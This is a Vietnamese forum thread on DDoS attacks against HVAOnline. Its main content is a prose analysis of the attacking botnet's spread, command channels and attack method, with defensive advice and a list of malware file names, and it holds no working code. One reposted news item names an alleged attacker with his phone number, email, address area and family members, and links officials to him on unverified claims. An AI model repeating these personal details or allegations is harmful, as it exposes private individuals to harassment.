Phân tích tính chất vài trận DDoS HVA vừa qua. Đi tắt" thì đúng là phải đi theo con đường ngắn nhất và phải đi đúng đường rồi. Còn "đón đầu" có nghĩa là ta phải đến đúng chỗ họ đang đứng . Nhưng cũng có nghĩa là phải đến mục tiêu trước họ hay đến điểm mà họ đang cố đi đến, cố hướng tới (mà họ chưa đến đươc), theo nghĩa mở rộng Thưc ra muốn đi tắt đón đón đầu trong công nghệ trước hết phải hiểu rất kỹ công nghệ mà người ta đang áp dụng, phải tìm hiểu thêm các kiến thức khác và cũng phải có những yếu tố sáng tao (innovation) nữa. Nếu không cũng không thể đón đầu được. Tai sao như vậy? Vì áp dung một công nghệ mới đã định hình vào hoàn cảnh VN hay hoàn cảnh một công ty, muốn thành công phải có yếu tố sáng tạo. Nếu không chắc chắn sẽ thất bại. Thành thử các yếu tố bắt chước và sáng tạo đan xen vào với nhau]]> /hvaonline/posts/list/39641.html#246991 /hvaonline/posts/list/39641.html#246991 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246992 /hvaonline/posts/list/39641.html#246992 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi wrote:
@PXMMRF : thông qua những gì anh tâm tình qua những bài viết, em thêm nể phục anh PXMMRF vì ngoài là một chuyên gia hoá học, một nhà kinh doanh chèo lái con thuyền công ty, tạo công ăn việc làm cho mọi người; còn là một IT master nữa . quả thật đáng khâm phục biết bao . em cũng đang bán các mặt hàng hoá chất cơ bản và các hoá chất đặc biết cho các ngành công nghiệp mía đường, ethanol, giấy, plastic. không biết anh và công ty có nhu cầu mua không ạ. em sẽ sent qoutation ngay mà. giá okie luôn. em bán hàng dạo, rồi bán hoá chất, giờ lại muốn làm IT em chẳng biết em sẽ đi về đâu buồn quá cơ . :(( xin các anh em chỉ giáo cho ạ .  
Nhất trí thôi! Em cứ send your best quotation đến đi nhé ( Đừng viết là "sẽ sent qoutation" đấy, hì hì). Chủ yêu là các hoá chất dùng cho Latex cao su thiên nhiên và cao su khô (chemicals for natural rubber latex and dry rubber). Sẽ liên hệ qua email sau.]]>
/hvaonline/posts/list/39641.html#246994 /hvaonline/posts/list/39641.html#246994 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246995 /hvaonline/posts/list/39641.html#246995 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
]]>
/hvaonline/posts/list/39641.html#246996 /hvaonline/posts/list/39641.html#246996 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Conmale Thế anh không thấy là muốn improve các thứ kia như hiện trạng xã hội, kinh tế, văn hoá, khoa học, kỹ thuật, đời sống...v...v... thì về mặt bản chất phải thay đổi cái gì ah? ]]> /hvaonline/posts/list/39641.html#246997 /hvaonline/posts/list/39641.html#246997 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

rongchaua wrote:
Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn 
Mình không có nhiều thời gian ngồi phân tích, nhưng mà mình khẳng định với bạn là, bạn nhìn nhận lịch sử của Nhật sai rồi. 1. Trước 1868, chính sách mạc là bế môn toả cảng, không thương mại,giao dịch với bất cứ nước nào. 2. Sau 1868, tức là sau Minh trị duy tân, thì mới bắt đầu đưa các Samurai của Nhật qua Pháp, Đức học. Bởi vậy, cho đến đệ nhị thế chiến, tuy Nhật đánh thắng các nước châu á nhưng về quân sự, kỹ thuật, tài nguyên, đều thua xa đồng minh Hoa kỳ, và phải nói là rất xa, cho nên, anh PXM nói như vậy là hoàn toàn chính xác. ]]>
/hvaonline/posts/list/39641.html#246999 /hvaonline/posts/list/39641.html#246999 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247002 /hvaonline/posts/list/39641.html#247002 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
@anh Conmale Thế anh không thấy là muốn improve các thứ kia như hiện trạng xã hội, kinh tế, văn hoá, khoa học, kỹ thuật, đời sống...v...v... thì về mặt bản chất phải thay đổi cái gì ah?  
Nói ngắn gọn: thay đổi tư duy. Nói dài hơn một tí nữa: thay đổi tư duy trong việc nhìn nhận vấn đề, biết tôn trọng lẽ phải, biết trung thực, biết nhận cái sai cái kém và phát huy cái mạnh, cái ưu việt. Đi sâu vào thực chất và bài trừ những thứ bề ngoài, những thành tích ảo. Tóm lại: muốn phát triển, muốn vươn tới những cái tốt đẹp thì phải biết dũng cảm nhìn thẳng vào thực chất vấn đề, đừng khoả lấp, đừng che đậy, đừng bám víu vào những thứ "niềm tin" mơ hồ. Dùng cái trí, cái dũng, cái đức để sống và sống cho có ý nghĩa chớ không phải sống vì bề ngoài và vì sỉ diện. Mỗi con người cần ý thức giá trị cũng như trách nhiệm của mình trong xã hội.]]>
/hvaonline/posts/list/39641.html#247003 /hvaonline/posts/list/39641.html#247003 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh wrote:

rongchaua wrote:
Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn 
Mình không có nhiều thời gian ngồi phân tích, nhưng mà mình khẳng định với bạn là, bạn nhìn nhận lịch sử của Nhật sai rồi. 1. Trước 1868, chính sách mạc là bế môn toả cảng, không thương mại,giao dịch với bất cứ nước nào. 2. Sau 1868, tức là sau Minh trị duy tân, thì mới bắt đầu đưa các Samurai của Nhật qua Pháp, Đức học. Bởi vậy, cho đến đệ nhị thế chiến, tuy Nhật đánh thắng các nước châu á nhưng về quân sự, kỹ thuật, tài nguyên, đều thua xa đồng minh Hoa kỳ, và phải nói là rất xa, cho nên, anh PXM nói như vậy là hoàn toàn chính xác.  
Mình nghĩ là bồ nhầm rồi, trước và trong chiến tranh thế giới thứ 2 nước Nhật cực kỳ phát triền. Có thể nói là đứng đầu Châu Á. Nếu không có Mỹ can thiệp, thì Nhật sẽ chiếm lĩnh toàn bộ Đông Châu Á, cho tới tận nước Úc xa xôi, bạn thấy đấy với một nước mà có thể chiếm đóng các quốc gia khác trên một diện tích rộng lớn như vậy thì bạn phải biết họ đã nằm ở đâu trên con đường phát triển. Bạn đã bao giờ tự hỏi tại sao Hawai xa xôi là thế mà Nhật Bản đánh cho Mỹ một vố đau ở trận Trân Châu Cảng không? Khi đấy Nhật Bản đã có xe tăng, máy bay, tàu chiến .... ]]>
/hvaonline/posts/list/39641.html#247004 /hvaonline/posts/list/39641.html#247004 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Dù cách viết của kutruoi có hơi lung tung, lan man nhưng về ý chính tôi vẫn đồng ý với quan điểm của bài post #932. Còn ai cảm thấy không chấp nhận được thì hãy đọc bài này http://www.gocnhinalan.com/Details.aspx?id=97 rồi suy nghĩ. Hãy đọc và suy nghĩ.   Liên kết hồi sáng có nội dung để đọc, giờ mất tiêu rồi. Không hiểu vì sao ???]]> /hvaonline/posts/list/39641.html#247014 /hvaonline/posts/list/39641.html#247014 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:

tranvanminh wrote:

rongchaua wrote:
Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn 
Mình không có nhiều thời gian ngồi phân tích, nhưng mà mình khẳng định với bạn là, bạn nhìn nhận lịch sử của Nhật sai rồi. 1. Trước 1868, chính sách mạc là bế môn toả cảng, không thương mại,giao dịch với bất cứ nước nào. 2. Sau 1868, tức là sau Minh trị duy tân, thì mới bắt đầu đưa các Samurai của Nhật qua Pháp, Đức học. Bởi vậy, cho đến đệ nhị thế chiến, tuy Nhật đánh thắng các nước châu á nhưng về quân sự, kỹ thuật, tài nguyên, đều thua xa đồng minh Hoa kỳ, và phải nói là rất xa, cho nên, anh PXM nói như vậy là hoàn toàn chính xác.  
Mình nghĩ là bồ nhầm rồi, trước và trong chiến tranh thế giới thứ 2 nước Nhật cực kỳ phát triền. Có thể nói là đứng đầu Châu Á. Nếu không có Mỹ can thiệp, thì Nhật sẽ chiếm lĩnh toàn bộ Đông Châu Á, cho tới tận nước Úc xa xôi, bạn thấy đấy với một nước mà có thể chiếm đóng các quốc gia khác trên một diện tích rộng lớn như vậy thì bạn phải biết họ đã nằm ở đâu trên con đường phát triển. Bạn đã bao giờ tự hỏi tại sao Hawai xa xôi là thế mà Nhật Bản đánh cho Mỹ một vố đau ở trận Trân Châu Cảng không? Khi đấy Nhật Bản đã có xe tăng, máy bay, tàu chiến ....  
Mình không so sánh Nhật và châu Á, mình đang so sánh Hoa Kỳ và Nhật ai phát triển hơn ai, bạn đọc kỹ lại giùm, tiện thể hỏi bạn vài câu, - Nếu Nhật phát triển hơn Hoa Kỳ thì tại sao Hoa Kỳ lại chế tạo được bom nguyên tử trước Nhật và thế giới? - Mình đã tự hỏi nhiều lần tại sao Trân châu cảng xa xôi như vậy mà Nhật đánh được là bởi vì "Roosevelt cho đánh"( mình nói có chứng cứ từ các tài liệu của Nhà trắng công bố trước đây vài năm). Ngoài ra, các cuộc chiến với Hoa Kỳ, Midway và Guadalcanal Nhật đều thua thảm bại, từ đó mới đúc kết được họ vốn thua Hoa kỳ về mọi mặt rất xa. - Nếu như Nhật tiến bộ như bạn nói thì tại sao bị Hoa Kỳ giải được hết các mật mã của Nhật dùng để truyền thông, triển khai chiến lược, rồi dẫn đến cái chết của đại tướng Yamamoto(Tổng tư lệnh hải quân đế quốc Nhật Bản)? - Nếu như Nhật tiến bộ hơn Mỹ thì tại sao Không quân Nhật bản lại dùng máy bay bằng gỗ của công ty Matsushita(Panasonic)? Rồi triển khai chiến dịch Kamikaze tàn khốc vậy để làm gì ? - Nếu như Hải quân của Nhật xịn hơn Mỹ thì tại sao chiến hạm Yamato bị vây đánh mà không thể trở tay trước không quân Hoa Kỳ ? - Và tóm lại, nếu như họ không thua gì Hoa Kỳ thì tại sao phải thảm bại với Hoa Kỳ ? ]]>
/hvaonline/posts/list/39641.html#247016 /hvaonline/posts/list/39641.html#247016 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh wrote:

texudo wrote:

tranvanminh wrote:

rongchaua wrote:
Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn 
Mình không có nhiều thời gian ngồi phân tích, nhưng mà mình khẳng định với bạn là, bạn nhìn nhận lịch sử của Nhật sai rồi. 1. Trước 1868, chính sách mạc là bế môn toả cảng, không thương mại,giao dịch với bất cứ nước nào. 2. Sau 1868, tức là sau Minh trị duy tân, thì mới bắt đầu đưa các Samurai của Nhật qua Pháp, Đức học. Bởi vậy, cho đến đệ nhị thế chiến, tuy Nhật đánh thắng các nước châu á nhưng về quân sự, kỹ thuật, tài nguyên, đều thua xa đồng minh Hoa kỳ, và phải nói là rất xa, cho nên, anh PXM nói như vậy là hoàn toàn chính xác.  
Mình nghĩ là bồ nhầm rồi, trước và trong chiến tranh thế giới thứ 2 nước Nhật cực kỳ phát triền. Có thể nói là đứng đầu Châu Á. Nếu không có Mỹ can thiệp, thì Nhật sẽ chiếm lĩnh toàn bộ Đông Châu Á, cho tới tận nước Úc xa xôi, bạn thấy đấy với một nước mà có thể chiếm đóng các quốc gia khác trên một diện tích rộng lớn như vậy thì bạn phải biết họ đã nằm ở đâu trên con đường phát triển. Bạn đã bao giờ tự hỏi tại sao Hawai xa xôi là thế mà Nhật Bản đánh cho Mỹ một vố đau ở trận Trân Châu Cảng không? Khi đấy Nhật Bản đã có xe tăng, máy bay, tàu chiến ....  
Mình không so sánh Nhật và châu Á, mình đang so sánh Hoa Kỳ và Nhật ai phát triển hơn ai, bạn đọc kỹ lại giùm, tiện thể hỏi bạn vài câu, - Nếu Nhật phát triển hơn Hoa Kỳ thì tại sao Hoa Kỳ lại chế tạo được bom nguyên tử trước Nhật và thế giới? - Mình đã tự hỏi nhiều lần tại sao Trân châu cảng xa xôi như vậy mà Nhật đánh được là bởi vì "Roosevelt cho đánh"( mình nói có chứng cứ từ các tài liệu của Nhà trắng công bố trước đây vài năm). Ngoài ra, các cuộc chiến với Hoa Kỳ, Midway và Guadalcanal Nhật đều thua thảm bại, từ đó mới đúc kết được họ vốn thua Hoa kỳ về mọi mặt rất xa. - Nếu như Nhật tiến bộ như bạn nói thì tại sao bị Hoa Kỳ giải được hết các mật mã của Nhật dùng để truyền thông, triển khai chiến lược, rồi dẫn đến cái chết của đại tướng Yamamoto(Tổng tư lệnh hải quân đế quốc Nhật Bản)? - Nếu như Nhật tiến bộ hơn Mỹ thì tại sao Không quân Nhật bản lại dùng máy bay bằng gỗ của công ty Matsushita(Panasonic)? Rồi triển khai chiến dịch Kamikaze tàn khốc vậy để làm gì ? - Nếu như Hải quân của Nhật xịn hơn Mỹ thì tại sao chiến hạm Yamato bị vây đánh mà không thể trở tay trước không quân Hoa Kỳ ? - Và tóm lại, nếu như họ không thua gì Hoa Kỳ thì tại sao phải thảm bại với Hoa Kỳ ?  
Nhật sau đệ nhị thế chiến không hơn Mỹ là cái chắc nhưng Nhật thời đó cũng là một cường quốc. Mỹ bị cú Trân Châu Cảng te tua đến độ quyết định chơi 2 trái bom nguyên tử xuống đất nước Nhật để nắm lại cán cân. Cái này là đòn chơi dứt điểm của Mỹ vì Mỹ dính với đồng minh ở Âu Châu đang đụng độ với Đức thời đó. Nhật không bằng Mỹ nhưng xét trọn bộ bối cảnh thế giới lúc đó, có bao nhiêu quốc gia có nền kỹ nghệ (hoá chất, hàng không, sản xuất... ) như Nhật? Anh nghĩ không ai nói là Nhật hơn Mỹ hết nhưng nói Nhật nghèo nàn lạc hậu và phải "đi tắt đón đầu" từ thời đầu thế kỷ 20 cho đến những thập niên sau đệ nhị thế chiến là không hoàn toàn chính xác.]]>
/hvaonline/posts/list/39641.html#247023 /hvaonline/posts/list/39641.html#247023 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. 1. Phát tán: Các zombies dùng để tấn công HVA đi qua hai đường chính: e-mail và web. Xuyên qua đường e-mail là các file đính kèm giả dạng .doc nhưng bản chất là các executables thường có tiêu đề và nội dung được soạn thảo sẵn tuỳ nhóm đối tượng được nhận. Hầu hết nạn nhân đều bị dính malware qua dạng này vì chủ quan hoặc cả tin hoặc thiếu kiến thức bảo mật. Xuyên qua đường web thường là các trang web phổ biến bị "owned" và chèn javascript để dẫn độc giả đến trang web độc hại. Nội dung của trang web độc hại thường có nội dung base64 encoded hoặc có javascript với các thủ thuật thông thường (như rotate và encode) để qua mặt những người không có kinh nghiêm bảo mật. Cho đến nay, cách ưa thích của dạng phát tán này là một java applet đơn giản dùng để "call" nội dung của một "parameter name" có trong nội dung trên trang web đi kèm với java applet. Đây là cách đơn giản để thực thi một vbs script được soạn sẵn và cũng nằm trong nội dung đi kèm trên trang web. Malware sử dụng cả hai phương tiện email và web đều thường giả mạo các binaries thông thường hoặc có sẵn trên máy của nạn nhân (ví dụ như binaries của Adobe, Sun, Intel, Apple....). Các malware thường tản rộng ra một hoặc nhiều dependencies nhằm giảm thiểu sự phát hiện của antiviruses trên máy. Đặc biệt cho đến nay, dạng malware mà stl sử dụng hoàn toàn là 32-bit Windows PE và chưa hề thấy có biến thái trên một hardware architecture nào khác. 2. Nhận lệnh: Zombies của stl nhận lệnh có trong payload được cài trong quá trình phát tán hoặc sau khi phát tán do một bộ phận khác của malware đảm nhận. Thông thường, các master-bots là những địa chỉ sử dụng dynamic DNS. Có lẽ đây là cách dễ lẫn vào mớ host muôn trùng hoặc dễ thay đổi IP thường xuyên hơn nếu bị phát hiện. Các master-bots cũng thường được sử dụng từ những nguồn khét tiếng dung dưỡng malware như "Santrex" và những hệ thống ở các nước ít chặt chẽ an ninh mạng. Thông tin zombies nhận được từ masters thường được mã hoá hoặc che đậy bằng một số hình thức và phương pháp ưa thích nhất là ấn định "User-agent" cụ thể cho phép zombies liên lạc (nhưng không cho phép người dùng bình thường truy cập). Nội dung lệnh thường là một chuỗi các giá trị "User-agent" khác nhau và một số biến đổi trong HTTP headers nhằm giúp zombies qua mặt được các hệ thống phòng thủ với biện pháp liên tục thay đổi "signature" (User-Agent và một số headers khác). 3. Tấn công: Zombies tấn công dồn dập hay chậm rãi tuỳ thuộc vào số lượng "thread" được ấn định cho mỗi zombie nhưng yếu tố quan trọng nhất là khả năng "crawl" như một search bot và lưu giữ giá trị sessions để tiếp tục crawl sâu vào bên trong. Những máy con bị biến thành zombie mà có cấu hình yếu thì sẽ bị trì trệ sau một khoảng thời gian ddos liên tục vào nạn nhân. Những đường dây kết nối Internet có băng thông kém thì sẽ bị chậm đáng kể. Ở phía nạn nhân, nếu không có biện pháp cản lọc đúng mức, hệ thống máy chủ sẽ ngưng hoạt động trong khoảng thời gian rất ngắn vì bị bão hoà đường truyền hoặc cạn kiệt tài nguyên. Bởi vì master-bots có thể ấn định nhiều mục tiêu tấn công cùng một lúc và nhiều URL khác cho nên zombies có thể chuyển hướng tấn công hoặc gia tăng biên độ tấn công. Master-bots có thể dễ dàng ước định số zombies được "sai khiến" và nguồn của các zombies từ đâu xuyên qua số truy cập đến máy chủ của master-bots để nhận chỉ thị. 4. Biến thái: Biến thái của dạng botnet này không nhiều. Với mô hình client / server này, biến thái ở cấp độ phát tán vẫn xoay quanh một số thủ thuật giả mạo binaries và một số biến thái lower level để qua mặt antiviruses trên phía máy con. Biến thái ở phía master-bots chỉ xoay quanh các tập mệnh lệnh được xào nấu nhưng không dùng motif mới. Botnet này phát huy được 3 yếu điểm để phát tán rộng rãi: a. Sự cả tin và thiếu kinh nghiệm của người dùng. b. Thói quen sử dụng máy với chủ quyền cao nhất. c. Thói quen tin tưởng vào antivirus mặc dù không cập nhật antivirus. 5. Cách khắc phục: Đối với người dùng bình thường: - Cài tường lửa cá nhân và lọc bỏ hết những tên miền cung cấp dynamic DNS. - Cài noscript trên trình duyệt và chỉ cho phép một số tên miền mình hoàn toàn tin tưởng được phép chạy javascript không bị kiểm soát. - Thường xuyên cập nhật antivirus. - Không cài software mình không tin tưởng hoặc từ nguồn không đáng tin cậy (lấy từ rapidshare và tương tự). - Không bấm "accept" trong khi duyệt web mà không kiểm tra kỹ lưỡng nguồn gởi hiển thị để "accept". - Không "double click" trên file đính kèm trên email. Kiểm tra kỹ nguồn IP và người gởi email trước khi nhận. - Block chuỗi IP của những quốc gia mình không viếng và các chuỗi IP của những data center khét tiếng dung dưỡng malware (google những thông tin này). Đối với người quản lý hệ thống bị tấn công: - Gia tăng băng thông. - Hình thành hệ thống cản lọc dựa trên số lần truy cập từ mỗi IP có những giá trị "User-agent" bị thay đổi liên tục. - Cản lọc những request có khả năng "crawl" mà không phải của google, yahoo hoặc một search engine nào đó mình thích dùng. - Mở rộng giải pháp load-balancer nếu có thể.]]> /hvaonline/posts/list/39641.html#247025 /hvaonline/posts/list/39641.html#247025 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247027 /hvaonline/posts/list/39641.html#247027 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
"Không cài software mình tin tưởng", có lẽ anh conmale cần bổ sung làm rõ ý này ở phần cách khắc phục. 
hì hì, anh thiếu chữ "không". Đã chỉnh ở trên. Cám ơn em.]]>
/hvaonline/posts/list/39641.html#247029 /hvaonline/posts/list/39641.html#247029 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
1. Downloader.exe: quá nhiều nguồn lấy về, mấy cái tracker.cmd cùi bắp dùng wget của em cũng chụp được.
2. QTTask.exe
3. QTTask.dll
4. rfc2616.exe
4. drwtsn32.exe
5. c6to4.dll
6. cversions.2.db
7. DrWatson.dll
8. rdpuser.mof
Lần này, em chả công bố gì cả, buồn buồn thì móc ra, analysing 1 vài hàm cho vui, RCE đầy đủ, rõ ràng, chậm mà chắc, chả ai ép mình về tiến độ, thời gian, chất lượng, tính pháp lý của công việc cả ???!!! Thích thì làm, không thích thì thôi. Em quyết tìm ra đầy đủ lý do tại sao hồi đó em bị mất toàn bộ username, password ! StaticCaches.dat chỉ là một phần nhỏ, phải không mấy anh stl ? Hồi đó mấy anh nói em chỉ RCE được 40%, qua một thời gian dài vừa qua, em promote lên được bao nhiêu % rồi, mấy anh stl ? Bộ mà em đang RCE, em nói trước, các AVs đã nhận mẫu và IDA database rồi, không công bố, chỉ âm thầm cập nhật, phân tích, theo dõi. Các anh stl nên hy sinh nó đi là vừa, nói thật và chân thành đấy ! Làm gì thì làm, đừng có cài cắm trojan ăn cắp thông tin trên máy victim, là máy của mọi người dân lương thiện, hiền lành, vô tội của Viêt Nam là được rồi ! ]]>
/hvaonline/posts/list/39641.html#247032 /hvaonline/posts/list/39641.html#247032 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247033 /hvaonline/posts/list/39641.html#247033 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Sinh tử lệnh là ai? Tất cả đã được bạch hóa đến mức khó ngờ. Tên thật của Sinh tử lệnh là Tuấn, sinh năm 1978 tại Quảng Nam. Y từng học qua trường THPT Hoàng Diệu tại Quảng Nam. Lên mạng, Tuấn có nick là tohoangvu. Tuấn hiện đang sống tại P.5 Quận 8, Saigon và làm việc ở Quận 1 dưới vỏ bọc là một nhà thiết kế. Số điện thoại liên lạc của Tuấn hiện nay, cho đến giờ phút này là 0932.060.268. Hộp thư chính để liên lạc cũng như để làm công việc thu lượm thông tin tấn công các nạn nhân, có địa chỉ là socidemo@yahoo.com.au. Tuấn kết hôn năm 2005 với một phụ nữ tên là Phan Thị Minh Thư, năm 2006 có đứa con gái đầu tiên, biệt danh là Chip. Tên thật của Sinh tử lệnh là Tuấn, sinh năm 1978 tại Quảng Nam. Y từng học qua trường THPT Hoàng Diệu tại Quảng Nam. Lên mạng, Tuấn có nick là tohoangvu. Tuấn hiện đang sống tại P.5 Quận 8, Saigon và làm việc ở Quận 1 dưới vỏ bọc là một nhà thiết kế. Từ cách thức của nhân vật bị lộ diện này, cho thấy, các nick xuất hiện trên mạng hay có đồng ý kiến nhưng cũng mang giọng điệu chửi bới cực đoan, rất có thể là công an mạng. Vì vậy, thận trong trong giao tiếp cho phép chat riêng và gửi mang kèm file... là những điều cần phải xét lại với những ai có chính kiến trên mạng. Tác giả TQN có khuyến cáo, cũng như nhiều chuyên viên tin học khác, rằng máy tính muốn thoát khỏi các vụ theo dõi, cướp hộp thư, blog... tốt nhất là nên hay thay đổi password, luôn cập nhật các chương trình rà soát virus trong máy. Thậm chí nếu cảm thấy không an tâm, cũng nên thay mới, cài lại các chương trình gõ chữ Việt, vốn có thể nhiễm virus và ghi lại các mật mã, chuyển tập tin đó cho các hacker của công an mạng. Sinh tử lệnh đã làm gì? Rất nhiều người cho rằng nhóm Sinh Tử lệnh này nằm dưới quyền của ông Lê Mạnh Hà, Giám đốc Sở Thông Tin Truyền Thông Saigon, có biệt hiệu là “thái tử”, vì ông ta vốn là con trai của nhà lãnh đạo cấp cao đầy quyền lực trong bóng tối, Lê Đức Anh. Một trong những hoạt động phôi thai nhưng không kém phần hiểm ác của nhóm này, được biết là vụ gài và bắt nhà dân chủ Trần Huỳnh Duy Thức vào năm 2009...   Nguồn: http://www.rfa.org/vietnamese/in_depth/hackers-work-vn-police-07082011100751.html Không biết những thông tin này thực hư thế nào]]> /hvaonline/posts/list/39641.html#247036 /hvaonline/posts/list/39641.html#247036 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

MoonyFall wrote:
Sinh tử lệnh là ai? Tất cả đã được bạch hóa đến mức khó ngờ. Tên thật của Sinh tử lệnh là Tuấn, sinh năm 1978 tại Quảng Nam. Y từng học qua trường THPT Hoàng Diệu tại Quảng Nam. Lên mạng, Tuấn có nick là tohoangvu. Tuấn hiện đang sống tại P.5 Quận 8, Saigon và làm việc ở Quận 1 dưới vỏ bọc là một nhà thiết kế. Số điện thoại liên lạc của Tuấn hiện nay, cho đến giờ phút này là 0932.060.268. Hộp thư chính để liên lạc cũng như để làm công việc thu lượm thông tin tấn công các nạn nhân, có địa chỉ là socidemo@yahoo.com.au. Tuấn kết hôn năm 2005 với một phụ nữ tên là Phan Thị Minh Thư, năm 2006 có đứa con gái đầu tiên, biệt danh là Chip. Tên thật của Sinh tử lệnh là Tuấn, sinh năm 1978 tại Quảng Nam. Y từng học qua trường THPT Hoàng Diệu tại Quảng Nam. Lên mạng, Tuấn có nick là tohoangvu. Tuấn hiện đang sống tại P.5 Quận 8, Saigon và làm việc ở Quận 1 dưới vỏ bọc là một nhà thiết kế. Từ cách thức của nhân vật bị lộ diện này, cho thấy, các nick xuất hiện trên mạng hay có đồng ý kiến nhưng cũng mang giọng điệu chửi bới cực đoan, rất có thể là công an mạng. Vì vậy, thận trong trong giao tiếp cho phép chat riêng và gửi mang kèm file... là những điều cần phải xét lại với những ai có chính kiến trên mạng. Tác giả TQN có khuyến cáo, cũng như nhiều chuyên viên tin học khác, rằng máy tính muốn thoát khỏi các vụ theo dõi, cướp hộp thư, blog... tốt nhất là nên hay thay đổi password, luôn cập nhật các chương trình rà soát virus trong máy. Thậm chí nếu cảm thấy không an tâm, cũng nên thay mới, cài lại các chương trình gõ chữ Việt, vốn có thể nhiễm virus và ghi lại các mật mã, chuyển tập tin đó cho các hacker của công an mạng. Sinh tử lệnh đã làm gì? Rất nhiều người cho rằng nhóm Sinh Tử lệnh này nằm dưới quyền của ông Lê Mạnh Hà, Giám đốc Sở Thông Tin Truyền Thông Saigon, có biệt hiệu là “thái tử”, vì ông ta vốn là con trai của nhà lãnh đạo cấp cao đầy quyền lực trong bóng tối, Lê Đức Anh. Một trong những hoạt động phôi thai nhưng không kém phần hiểm ác của nhóm này, được biết là vụ gài và bắt nhà dân chủ Trần Huỳnh Duy Thức vào năm 2009...  
Nguồn: http://www.rfa.org/vietnamese/in_depth/hackers-work-vn-police-07082011100751.html Không biết những thông tin này thực hư thế nào 
@MoonFall : xin chào anh, cho dù thông tin đó là thực. một anh chàng Tuấn abc bờ cờ nào đó là STL thì bây giờ cũng chẳng quan trọng và mặc dù anh TQN ngay từ hồi đầu đã tóm được email và RC được cái socidemo@yahoo.com.au , rồi gmail rồi abc bờ cờ và biết chắc vị Tuấn này là tac giả tác phẩm một trong số virus malware . . . từ lâu rồi. nhưng KỆ he he he . thế mới hay. STL kô phải là một vị Tuấn nào đó, mà là một tổ chức cần được chúng ta ...bàn tiếp :P . chẳng ai chấp nhật vị Tuấn đấy là STL toàn bộ cả . thế thì mất vui lắm. phải có tổ chức, giáo phái đứng sau đầu tư, giật dây. phải có Trung quốc, phải có động cơ chính trị, phải có " thái tử " phải có công chúa. Phải có c15 , phải có anh TQN , có anh conmale , có anh PXMMF .v.v. phải có phải có tất cả . thế mới vui mà . tui Rfa.org này ..chưa forensic rồi. oài . ]]>
/hvaonline/posts/list/39641.html#247039 /hvaonline/posts/list/39641.html#247039 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247040 /hvaonline/posts/list/39641.html#247040 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv wrote:
Em chào các bác, có việc cần nhờ các bác giúp đỡ chút ạ Tình hình là em quản lý 1 con server windows 2003 có mấy ngày vừa rồi em ko vào theo dõi, hôm nay vào xem cái log Event Viewer phát hiện ra server của em liên tục bị tấn công từ xa vào tài khoản sa của sqlserver 2003, có 3 ngày mà nó cố tình log vào đến vài ngàn lần, may mày mấy bữa trước em cảnh giác đã disable tài khoản sa đi rồi, em quên mất ko đóng cổng sqlserver lại Mấy cái nơi chuyên request đến là các ip sau: 27.98.197.136; 111.68.10.26; 184.106.244.29; 208.43.153.125; 66.85.136.37 và tầm hơn chục ip khác, chúng đều cố tình log vào tài khoản sa của sqlserver thía là chúng nó đã bắt đầu uýnh em rùi, các bác có cách nào để bảo vệ an toàn ko chỉ e với, hiện tại em chỉ giám để mỗi cổng 80 hoạt động thôi, còn lại dùng firewall chặn hết các cổng khác, windows thì update thường xuyên 
Bồ nên tạo một chủ đề khác. Cái này không nằm trong chủ đề đang thảo luận.]]>
/hvaonline/posts/list/39641.html#247043 /hvaonline/posts/list/39641.html#247043 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl wrote:
Em xin ngoài lề một tý: "Trong lĩnh vực cơ khí - tự động hóa, công trình "Dây chuyền sản xuất găng phẫu thuật y tế từ cao xu thiên nhiên" của KS Phạm Xuân Mai và cộng sự thuộc Công ty Cổ phần MERUFA đã đoạt Giải nhất. Đây là lần đầu tiên các nhà khoa học Việt Nam tự nghiên cứu, thiết kế, chế tạo và đưa vào sản xuất thành công dây chuyền tự động hóa, đồng bộ và hoàn chỉnh sản xuất găng mổ sử dụng nguyên liệu chính là cao su tự nhiên của Việt Nam, dây chuyền nói trên cho sản phẩm đoạt tiêu chuẩn quốc tế, giá rẻ hơn 30% so với giá găng nhập ngoại." nguồn http://environment-safety.com/news/data/2005_VIFOTEC.htm chúc anh PXMMRF thành công và có nhiều đóng góp hơn nữa cho xã hội ! hơn hẳn những người chỉ biết chỉ trích mà không (hoặc chưa) làm được gì thật sự có ích cho xã hội  
